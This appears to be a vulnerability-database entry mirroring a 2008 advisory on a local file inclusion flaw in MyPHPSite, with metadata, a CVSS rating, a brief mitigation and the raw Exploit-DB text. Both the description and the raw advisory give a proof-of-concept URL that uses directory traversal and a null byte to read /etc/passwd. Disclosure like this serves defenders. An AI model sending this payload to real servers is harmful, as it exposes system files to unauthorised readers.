MyPHPSite Local File Inclusion Vulnerability

vendor:

MyPHPSite

by:

Piker

5.5

CVSS

MEDIUM

Local File Inclusion

CWE

Product Name: MyPHPSite

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

MyPHPSite Local File Inclusion Vulnerability

MyPHPSite is vulnerable to Local File Inclusion (LFI) vulnerability. An attacker can exploit this vulnerability by sending a crafted HTTP request containing a maliciously crafted URL with a maliciously crafted parameter value. The maliciously crafted parameter value contains a maliciously crafted path to a file on the server. The maliciously crafted path can be used to access sensitive files on the server, such as the /etc/passwd file. The PoC for this vulnerability is http://[target]/[path]/index.php?mod=../../../../../../etc/passwd%00

Mitigation:

The best way to mitigate this vulnerability is to ensure that all user input is properly sanitized and validated before being used in any file operations.

Source

Exploit-DB raw data:

################## Piker #######################################
#
#
#    MyPHPSite Local File Inclusion Vulnerability
#
#
#    Affected software: MyPHPSite
#    Vendor: www.myphpsite.org
#    Risk: Medium
#
################################################################
#
#    http://[target]/[path]/index.php?mod=[LFI]%00
#
#   PoC: http://[target]/[path]/index.php?mod=../../../../../../etc/passwd%00
#
################################################################
#
#         Found by Piker [piker0x90(at)gmail(dot)com]
#            D.O.M Labs - Security Researchers
#           www.domlabs.org
#
#
################################################################

# milw0rm.com [2008-12-18]